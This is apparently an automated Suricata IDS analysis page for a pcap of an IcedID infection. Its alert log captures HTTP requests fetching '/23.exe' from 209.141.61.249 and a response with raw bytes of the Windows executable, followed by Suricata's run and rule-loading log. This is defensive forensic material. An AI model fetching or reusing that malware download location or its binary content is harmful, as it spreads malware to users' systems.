Filename: 2018-12-17-IcedID-from-password-protected-Word-doc.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.1533219814 seconds
Hash: 6771a04700e519a87e61a9e8fa2a5921
Uploaded: 1548330751

Logfiles


unified2.alert.1548330770 - (36646 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
4\¾·	Ê ÜR
eэ=ùÀP…\¾·\¾·	Ê iE[Ž¦
eэ=ùÀPP6¦GET /23.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.141.61.249
Connection: Keep-Alive

4\¾·	Ê Í
eэ=ùÀP…\¾·\¾·	Ê iE[Ž¦
eэ=ùÀPP6¦GET /23.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.141.61.249
Connection: Keep-Alive

4\¾·	Ê ܖ
eэ=ùÀP…\¾·\¾·	Ê iE[Ž¦
eэ=ùÀPP6¦GET /23.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 209.141.61.249
Connection: Keep-Alive

4\¾·	ÏËÚ¢э=ù
ePÀN\¾·\¾·	ÏË2E$ŠÝэ=ù
ePÀPƒ HTTP/1.1 200 OK
Date: Mon, 17 Dec 2018 15:20:20 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 17 Dec 2018 02:13:20 GMT
ETag: "26878-57d2e531e1000"
Accept-Ranges: bytes
Content-Length: 157816
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

MZÿÿ¸@غ´	Í!¸LÍ!This program cannot be run in DOS mode.

$­1(‡éPFÔéPFÔéPFÔ*_ÔëPFÔéPGÔ@PFÔ*_ÔæPFÔ½svÔãPFÔ.V@ÔèPFÔRichéPFÔPEL'{WàjR8€@ð@…… àH€À.text“hj `.rdatað€n@@.data¸+ ‚@À.ndataЀÀ.rsrcHàš@@\¾·\¾·	ÏËêEÜŠ%э=ù
ePÀP׆U‹ìƒì\ƒ}t+ƒ}F‹Eu
ƒH‹
ÈÊB‰HPÿuÿuÿuÿ,‚@éBSV‹5ÐÊBE¤WPÿuÿ0‚@ƒeô‰EEäPÿuÿ4‚@‹}ðƒeð‹`€@逶FR¶VV¯Uè‹Ï+Mè¯Á‰M™÷ÿ3Ҋð¶FQ¯Á¶NU¯MèÁ‹Ê™÷ÿ¶VT¯UèŠÈ¶FP¯E™÷ÿÁá¶ÀȍEôP‰Møÿ\€@ƒEð‰EPEäPÿuÿ8‚@ÿuÿӃEè9}èŒwÿÿÿƒ~Xÿteÿv4ÿX€@…À‰EtU‹}jWÇEäÇEèÿT€@ÿvXWÿL€@ÿu‹5P€@Wÿ։EEäh PjÿhÀºBWÿ<‚@ÿuWÿÖÿuÿӍE¤Pÿuÿ”‚@_^3À[É‹L$¡èÊB‹ÑSiÒVW‹TöÂtOq3ÿ;5ìÊBsB‹ÎiɍD‹öÁtGëöÁt	‹ÏO…Ét ëöÁu‹Ù3ڃã3ىF;5ìÊBrÊ_^[ÂU‹ìQQ‹USV‹òiö‹èÊB3ÉóW‰Mü‰Mø‹F¨t9Mt$¾B‰F;ìÊBsD‹ÂiÀ|B‹öÁt
jRè¥ÿÿÿ‹öÁu(öÁ@tÿEüöÁtÿEüëÿEø;ìÊB‹Ðr¼3À_^[Ƀ}ütóƒ}øtƒN@ëç‹N€áƒÉ‰NëًL$¡èÊBV3öƒù s495ìÊBv,PW‹¨u3ÿGÓç…zütë$þ‰FÂ;5ìÊBrÙ_^ÂU‹ìƒì¡ÐÊBƒeüSV”W‹=ìÊB‰Eø‹Eø3Û9tK;ßsE‹5èÊBƒÆ‹öÂu(‹E…Àtƒ<˜t‹Mü3À@ƒâÓà‹Nü#ȋÁ‹MüÓâ;ÂuCÆ;ßrÆ;ßt
ÿEüƒEøƒ}ü rŸ‹Eü_^[É‹D$…À}@¹ÐBÁà+ÈQèæRÂV‹t$ëj‹Æ‹
ðÊBkÀÁƒ8t\PèŒ=ÿÿÿtUPè¸ÿÿÿ…Àu@FëH‹Î‹ð+Áƒ|$t/¬ºBjÿ5”ºBh0uÿ5¬ºBÿ\@Phÿt$ÿ(‚@…ö}’3À^¸ÿÿÿëõ‹D$‹
ÐÊBjÿtlèiÿÿÿÂhP¾@ÿt$è¬CÂU‹ìì°SV‹u¡ÈÊBWjY}Ðó¥‹Uԋ}؋MЋò‰Eô¸ÐBÁæÁçðøEÔ3Û£PÞ@AþƒøD‰]ü‡ÿ$…¶.@Rh¤¬@è.W‹EÔYYé
SèsPh„¬@èWYYSÿuÔèCéŠÿŒºB9]ô„{Sÿh‚@éoRè‰þÿÿ‹ðNVhp¬@èÔVYYSVèŽþÿÿé¯SèPhP¬@èµVYYSÿuÔèÁBéƒSè׋ðVh<¬@è’VYƒþY3öFVÿ„€@éZh ¬@èrVYÿuôÿp‚@éA‹ÂÁà9]Üu"‹ˆ@ËBj‰ˆ€ËBè~–\¾·\¾·	ÏËzEl‹•Ñ=ù
ePÀP¿¿‹Mԉ@ËB鋈€ËB‰ˆ@ËBé‹E܍4…@ËB3À‹;Ë”À#Mà‹D…Ô‰éî‹EØÿ4…@ËBVé|¡ºB‹5 ‚@;Ãt	ÿuØPÿ֋UÔ¡¤ºB;Ä®RPÿÖé¥jðèÿu؋ðVhä«@è°UƒÄÿuØVÿ€€@…À…yÇEüh°«@èŠUéÕjðèÓÿu؉EPhx«@èmUƒÄÿuèK‹ð;ó„’j\VèwJ‹ðf‹>f‰f;ûu9]ÜtèîF…Àt
ÿuèHFëÿuè»F;Ãt<=·tPÿuh «@è
UƒÄÿEüë.ÿuÿ|€@¨u!ÿuh¨ª@èèTÿEüë
ÿuhhª@èÖTYYf‰>FFf;û…nÿÿÿ9]ØtDjæèýÿÿÿuh€CèóOÿuÿt€@…À…zÿp€@Pÿuh ª@èˆTƒÄÿEüé[jõéA
SèÅ‹ðVè™T…ÀtÿuØVhÈ©@èVTƒÄéUÿuÜVh`©@è@TƒÄ‹EÜéjÐèƒjߋðèzj‰Eèp‹øWhD©@èTYYÿuVÿx€@…ÀtjãéÂ9]Üt%VèT…ÀtÿuVèÆMjäè5üÿÿWh©@éWÇEühô¨@éSè
‹ðEPWhVÿ¼€@…Àt$‹E;Æv'f9t"Vè½S;ÃtƒÀ,PÿuèÂNë
ÇEüf‰9]Ü…EhWWÿ¸€@é3jÿ裍MQVhSPSÿ@…À…éNjïè|PVèjJ…À…öébj1èa‹ð‹EԋÈVÁøƒàƒáPQh€¨@‰uð‰MèéRƒÄVèQHV¾P¶@…ÀtVèNëh€CVè	NPè·GPèNVè‹P¿PÆ@ƒ}|1VèÑR3É;ÃtMàƒÀQPÿ@‹È‹EƒÀý
€#Á÷ØÀ@‰E9]uVè`I3Àƒ}•À@Ph@VèoIƒøÿ‰Eø…·9]uwVhH¨@è8RYYhÐBWèqMVhÐBèfMÿuèhP¾@è{MWhÐBèNM‹EÔÁøN\¾·\¾·	ÏË2E$ŠÝэ=ù
ePÀP_"PhP¾@è)Dƒèuh¨@èèQYé6ÿÿÿHt8hè§@èÕQYVjúé¿úÿÿÿuðjâèÙ=ƒ}uÇEüÿuVh˜§@éhd§@èQÿHËBYéxÿuðjêèž=ÿtËBSSÿuøÿuÜèñÿ
tËB‹øVWh4§@è`QƒÄƒ}àÿuƒ}äÿtEàPEàSPÿuøÿ@ÿuøÿ@;ûƒÿþujéVè‰LÿuðVèzLëjîVèvLVh,§@èQYYh Véx
SèE‹ðVh§@ëTj1è4‹ðVÿuÔhè¦@èÏPƒÄÿuÔVèõB;Ä
;EÜ„_;Eä…‡‹EèéŠjðèï‹ðVhЦ@èPYYÿuØVè`Cé[jèËPèÌKéÛ
jèœj‰Eè’j‹øè¦9]܉Eøf‰t	9]„Pè“K;û}øˆ	;ø~‹ø‹EøxPVè^K‹};û„ë}VèaKøy‰]‹ûÿÎf‰~éÅj è5j1‹ðè,9]äPVuÿ@…Àusé„ûÿÿÿ @ëï3ÿGWèhVP‰Eÿ@…Àt9]ÜtVÿuÿ @…Àu‰}üf‰f‰žþéUSè©j‹ðè 9]èu;ð|Žûÿÿë;ðs‹Eàé4†ûÿÿ‹Eäé&jènj‹øèe‹È‹Eàƒøwmÿ$…Ê/@ùëb+ùë^¯Ï‹ùëW;ËtB‹Ç™÷ù‹øëJùëF#ùëB3ùë>3À;û”Àëç;ûuë3ÿë+;ûtø;Ëtô3ÿGë;Ët	‹Ç™÷ù‹úë3ÿÇEüëÓçëÓÿWéµøÿÿjèþj‹øèØPWVÿœ‚@éó
‹E܋=TÞ@;ÃtPH;ût
‹?;Ãuõ;ûuÿuÜhœ¦@èiNYYéփǾP¶@WVè™I¡TÞ@ƒÀPWèŠI¡TÞ@VƒÀPé:9]Øt1;ûuhx¦@è"NYékGPVèXI‹W£TÞ@ÿ(@éÝhj@ÿ,@ÿuԋðFPèLI¡TÞ@‰‰5TÞ@é°jèj‰EìèùöEè‰Et
j3è‰EìöEèt
jDèö‰Eƒ}Ð!juDèÉj‹øèÀ‹MèÁùtUøRQSÿuÿuìPWÿ|‚@÷ØÀ@‰EüëCÿuÿuìPWÿ(‚@ë0è¢j‹øè™f‹f÷ÙÉ#Èf‹f÷ØÀQ#ÇPÿuÿuìÿ€‚@‰Eø9]ÔŒôÿuøé÷ÿÿSè@PÿN\¾·\¾·	ÏË2E$ŠÝэ=ù
ePÀPšr„‚@…À„¼øÿÿ‹EØéÚjè"PjèPÿˆ‚@éF
¡ËB‹MØÁPjëSèûPÿx‚@é•ÿuØÿuôÿˆ‚@‹ðE¬PVÿ4‚@‹E¸j¯EÜP‹E´¯EÜPSSèÚPSÿt‚@PShrVÿ(‚@;ÄEPÿ`€@é9ÿuôÿd‚@‹øjHjZWÿd€@PjèuPÿ\@Wÿuô÷Ø£XÞ@ÿ‚@jèV£hÞ@ŠEäÿu؊ȀáÆoÞ@ˆ
lÞ@ŠÈ€á$htÞ@ˆ
mÞ@¢nÞ@èMGhXÞ@ÿX€@éE	Sèj‹ðèþ9]܋øth`¦@èµKY9]àWVuÿ ‚@é€ÿ ‚@éuSèæj1‹ðèÝj"‹ØèÔj‹øèËjìèÌóÿÿf‹ÿuàf÷ØÀh€C#ÇPf‹f÷ØÀS#ÆPÿuôÿˆ@ƒø!}PWSVhè¥@è4KƒÄé{WSVh€¥@èKƒÄéõ
Sèf‹ðVhX¥@èKYYVjëè7VèÁ<;ÉEVteh,¥@èâJ9]ÜYYtF‹5$@ëjèÐKjdÿuÿÖ=tëEøPÿuÿ8@9]Ø|ÿuøWè0Eë9]øtÇEüÿuÿ@ée
ÇEühè¤@éÀjèÄPèšJ;ÉEt‹ØÿsWèäDÿséTôÿÿf‰f‰é“
jî蒍MÀ‰EÈQPjèöJÿÐf‰;ÉEøf‰ÇEü„òPj@ÿ,@;ÉE„Þj	èÁJj
‰Eìè·Jÿu‰EÄÿuøSÿuÈÿUì…Àt2E¸PEðPhä¤@ÿuÿUąÀt‹EðÿpVèED‹EðÿpWè9D‰]üÿué—ûÿÿ9xËBÇEüŒäjðèÜ
j‹øèÓ
9]ä‰EøtWÿp@;ÉEujSWÿl@;ÉE„ÿuøÿuèJ‹ð;ót=9]܉]ütÿuÜèñÿÿÿօÀtBÇEüë9h @hTÞ@hÐBhÿuôÿփÄëÿuøj÷è5Wÿuøh¤@èíHƒÄ9]à…¿ÿuèÝ…À„¯ÿuÿt@é¡jöèñÿÿWh8¤@è±HYYéˆjçèñÿÿhØ£@é
óÿÿjðèçj߉EÌèÝj‰EøèÓj͉EÄèÉjE‰EÈè¿ÿuø‰EÀ‹Eä‹ø‹È‹ðá€ÁøÁþ%ÿÿçÿ‰M¸ƒæ‰Eðè§=…Àuj!è€ÿuðVWÿuÈÿuÄÿuøÿuÌhP£@èHƒÄ E4\¾¸«Ώ!э=ù
ePÀN\¾¸\¾¸«2E$ŠÝэ=ù
ePÀPjäanel\InternationalControl Panel\Desktop\ResourceLocale4  Aÿþ%dSoftware\Microsoft\Windows\CurrentVersion\Microsoft\Internet Explorer\Quick LaunchùÀFÀFÀF†ÎŒp€D‡.‘˜ø…À‘L€(‡L’|¬…F“€ä…’“8€Xˆæ“¬‚Î’2“““î’Þ’X’¼’®’œ’Š’v’h’~“T“h“€J‘:‘Z‘f‘|‘’‘¢‘²‘bŠrŠVŠŠŠ Š¶Š¾ŠÎŠÜŠêŠ‹‹ ‹.‹H‹`‹p‹‚‹.ŠBŠ¬‹¸‹Ì‹Ü‹ê‹ú‹Œ Œ4Œ@ŒTŒ`ŒlŒxŒ†Œ’Œ¨ŒºŒ¾‰ ŠŠŠò‰æ‰Ú‰Œ‰°‰¢‰‹ ‹v‰vˆ„ˆ–ˆ¦ˆ²ˆÄˆÚˆæˆlˆ‰$‰òˆP‰b‰B‰.’’î‘Þ‘’Ê‘&6HXfx„’¤¸ÎÞìþ"6HÖŽôŽxŠž°ÂØäðü
‘‘bR@0ôŒèŒâŽšŽÄŽ¬ŽlŽŠŽxŽ6Ž\ŽnŽ*Žðv„À°¤–XjÜŒLŽÖâŽ´“Æ“Ö“ “tMuN\¾¸\¾¸«2E$ŠÝэ=ù
ePÀP“ÿlDiv„DeleteFileWÕFindFirstFileWÝFindNextFileWÎFindCloseSetFilePointeruMultiByteToWideCharµReadFileÌlstrlenA”WideCharToMultiByteGetPrivateProfileStringWªWritePrivateProfileStringWøFreeLibraryTLoadLibraryExW‚GetModuleHandleWZGetExitCodeProcessWaitForSingleObjectøGlobalAllocÿGlobalFree½ExpandEnvironmentStringsWÁlstrcmpWÄlstrcmpiW4CloseHandleSetFileTime9CompareFileTimeÜSearchPathW¶GetShortPathNameWjGetFullPathNameWqMoveFileWqGetLastErrorSetCurrentDirectoryWaGetFileAttributesWSetFileAttributesWVSleepßGetTickCountVCreateFileWcGetFileSize~GetModuleFileNameWBGetCurrentProcessFCopyFileW¹ExitProcessSetEnvironmentVariableWôGetWindowsDirectoryWÖGetTempPathWGetCommandLineWèGetVersionSetErrorModeÍlstrlenWÊlstrcpynWPGetDiskFreeSpaceW
GlobalUnlockGlobalLockoCreateThreadNCreateDirectoryWiCreateProcessWÅRemoveDirectoryWÃlstrcmpiAÔGetTempFileNameW¤WriteFileÆlstrcpyAÇlstrcpyWpMoveFileExW¾lstrcatWÂGetSystemDirectoryW GetProcAddressGetModuleHandleAKERNEL32.dllÈEndPaint¿DrawTextWâFillRectÿGetClientRect
BeginPaintDefWindowProcW@SendMessageW“InvalidateRectÄEnableWindow*ReleaseD\¾¸\¾¸«êEÜŠ%э=ù
ePÀP6CGetDCÁLoadImageWSetWindowLongWGetDlgItem­IsWindowåFindWindowExW?SendMessageTimeoutWØwsprintfW’ShowWindowWSetForegroundWindowPostQuitMessage‡SetWindowTextWzSetTimerVCreateDialogParamW™DestroyWindowáExitWindowsEx,CharNextWŸDialogBoxParamWùGetClassInfoWaCreateWindowExWšSystemParametersInfoWRegisterClassWÆEndDialog1ScreenToClienttGetWindowRectÂEnableMenuItem\GetSystemMenuHSetClassLongW®IsWindowEnabledƒSetWindowPosZGetSysColoroGetWindowLongWMSetCursor½LoadCursorW8CheckDlgButtonòGetAsyncKeyState£IsDlgButtonChecked<GetMessagePos¹LoadBitmapWCallWindowProcW±IsWindowVisibleBCloseClipboardJSetClipboardDataÁEmptyClipboardöOpenClipboard¤TrackPopupMenu	AppendMenuW^CreatePopupMenu]GetSystemMetricsTSetDlgItemTextWGetDlgItemTextWãMessageBoxIndirectW/CharPrevW*CharNextA×wsprintfAÚwvsprintfW¢DispatchMessageWPeekMessageWUSER32.dllSelectObject<SetTextColorSetBkMode=CreateFontIndirectW)CreateBrushIndirectDeleteObjectkGetDeviceCapsSetBkColorGDI32.dll›SHFileOperationWShellExecuteW­SHGetFileInfoWzSHBrowseForFolderW½SHGetPathFromIDListWÃSHGetSpecialFolderLocationSHELL32.dllâRegEnumValueWàRegEnumKeyWøRegQueryValueExWRegSetValueExWÒRegCreateKeyExWËRegCloseKeyÙRegDeleteValueW×RegDeleteKeyWíRegOpenKeyExWAdjustTokenPrivilegesPLookupPrivilegeValueW¬–\¾¸\¾¸«zEl‹•Ñ=ù
ePÀPþOpenProcessToken/SetFileSecurityWADVAPI32.dll8ImageList_Destroy4ImageList_AddMasked7ImageList_CreateCOMCTL32.dllCoCreateInstanceOleUninitializeîOleInitializeeCoTaskMemFreeole32.dll@ËB‰@ i@è=@logging set to %dsettings logging to %dcreated uninstaller: %d, "%s"WriteReg: error creating key "%s\%s"WriteReg: error writing into "%s\%s" "%s"WriteRegBin: "%s\%s" "%s"="%s"WriteRegDWORD: "%s\%s" "%s"="0x%08x"WriteRegExpandStr: "%s\%s" "%s"="%s"WriteRegStr: "%s\%s" "%s"="%s"DeleteRegKey: "%s\%s"DeleteRegValue: "%s\%s" "%s"
WriteINIStr: wrote [%s] %s=%s in %s<RM>CopyFiles "%s"->"%s"CreateShorN\¾¸\¾¸«2E$ŠÝэ=ù
ePÀPèÇtcut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%dError registering DLL: Could not initialize OLEError registering DLL: Could not load %sError registering DLL: %s not found in %s\Exec: failed createprocess ("%s")Exec: success ("%s")Exec: command="%s"ExecShell: success ("%s": file:"%s" params:"%s")ExecShell: warning: error ("%s": file:"%s" params:"%s")=%dHideWindowPop: stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error, user cancelFile: skipped: "%s" (overwriteflag=%d)File: error, user abortFile: error, user retryFile: error 4\¾¸«ÚBэ=ù
ePÀN\¾¸\¾¸«2E$ŠÝэ=ù
ePÀPjäanel\InternationalControl Panel\Desktop\ResourceLocale4  Aÿþ%dSoftware\Microsoft\Windows\CurrentVersion\Microsoft\Internet Explorer\Quick LaunchùÀFÀFÀF†ÎŒp€D‡.‘˜ø…À‘L€(‡L’|¬…F“€ä…’“8€Xˆæ“¬‚Î’2“““î’Þ’X’¼’®’œ’Š’v’h’~“T“h“€J‘:‘Z‘f‘|‘’‘¢‘²‘bŠrŠVŠŠŠ Š¶Š¾ŠÎŠÜŠêŠ‹‹ ‹.‹H‹`‹p‹‚‹.ŠBŠ¬‹¸‹Ì‹Ü‹ê‹ú‹Œ Œ4Œ@ŒTŒ`ŒlŒxŒ†Œ’Œ¨ŒºŒ¾‰ ŠŠŠò‰æ‰Ú‰Œ‰°‰¢‰‹ ‹v‰vˆ„ˆ–ˆ¦ˆ²ˆÄˆÚˆæˆlˆ‰$‰òˆP‰b‰B‰.’’î‘Þ‘’Ê‘&6HXfx„’¤¸ÎÞìþ"6HÖŽôŽxŠž°Â

This file has been truncated. Go here to download in full.


suricata-report-2019-01-24-T-11-52-53-01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap.txt - (17847 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/6771a04700e519a87e61a9e8fa2a592156b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01242019.1152-2018-12-17-IcedID-from-password-protected-Word-doc.pcap -vvv -k none
elapsedtime:21.287486
stderr:
stdout:
24/1/2019 -- 11:52:31 - <Info> - Configuration node 'rule-files' redefined.
24/1/2019 -- 11:52:31 - <Notice> - This is Suricata version 4.0.0 RELEASE
24/1/2019 -- 11:52:31 - <Info> - CPUs/cores online: 1
24/1/2019 -- 11:52:31 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33360 and 'request-body-inspect-window' set to 17182 after randomization.
24/1/2019 -- 11:52:31 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33041 and 'response-body-inspect-window' set to 16698 after randomization.
24/1/2019 -- 11:52:31 - <Config> - DNS request flood protection level: 500
24/1/2019 -- 11:52:31 - <Config> - DNS per flow memcap (state-memcap): 524288
24/1/2019 -- 11:52:31 - <Config> - DNS global memcap: 16777216
24/1/2019 -- 11:52:31 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
24/1/2019 -- 11:52:31 - <Config> - preallocated 1000 hosts of size 136
24/1/2019 -- 11:52:31 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
24/1/2019 -- 11:52:31 - <Config> - using magic-file /usr/share/file/magic
24/1/2019 -- 11:52:31 - <Config> - Core dump size is unlimited.
24/1/2019 -- 11:52:31 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
24/1/2019 -- 11:52:31 - <Config> - preallocated 1000 defrag trackers of size 168
24/1/2019 -- 11:52:31 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
24/1/2019 -- 11:52:31 - <Config> - stream "prealloc-sessions": 2048 (per thread)
24/1/2019 -- 11:52:31 - <Config> - stream "memcap": 33554432
24/1/2019 -- 11:52:31 - <Config> - stream "midstream" session pickups: disabled
24/1/2019 -- 11:52:31 - <Config> - stream "async-oneside": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "checksum-validation": disabled
24/1/2019 -- 11:52:31 - <Config> - stream."inline": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "bypass": disabled
24/1/2019 -- 11:52:31 - <Config> - stream "max-synack-queued": 5
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "memcap": 134217728
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "depth": 0
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "toserver-chunk-size": 2573
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "toclient-chunk-size": 2591
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly.raw: enabled
24/1/2019 -- 11:52:31 - <Config> - stream.reassembly "segment-prealloc": 2048
24/1/2019 -- 11:52:31 - <Config> - Delayed detect disabled
24/1/2019 -- 11:52:31 - <Config> - pattern matchers: MPM: ac, SPM: bm
24/1/2019 -- 11:52:31 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
24/1/2019 -- 11:52:31 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
24/1/2019 -- 11:52:31 - <Config> - prefilter engines: MPM
24/1/2019 -- 11:52:31 - <Config> - IP reputation disabled
24/1/2019 -- 11:52:31 - <Perf> - Registered 148 keyword profiling counters.
24/1/2019 -- 11:52:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
24/1/2019 -- 11:52:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
24/1/2019 -- 11:52:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
24/1/2019 -- 11:52:36 - <Config> - No rules loaded from ET-icmp.rules.
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
24/1/2019 -- 11:52:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
24/1/2019 -- 11:52:37 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
24/1/2019 -- 11:52:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
24/1/2019 -- 11:52:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
24/1/2019 -- 11:52:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
24/1/2019 -- 11:52:42 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
24/1/2019 -- 11:52:43 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
24/1/2019 -- 11:52:43 - <Config> - No rules loaded from local.rules.
24/1/2019 -- 11:52:43 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
24/1/2019 -- 11:52:44 - <Info> - Threshold config parsed: 0 rule(s) found
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tcp-packet
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for tcp-stream
24/1/2019 -- 11:52:44 - <Perf> - using shared mpm ctx' for udp-packet
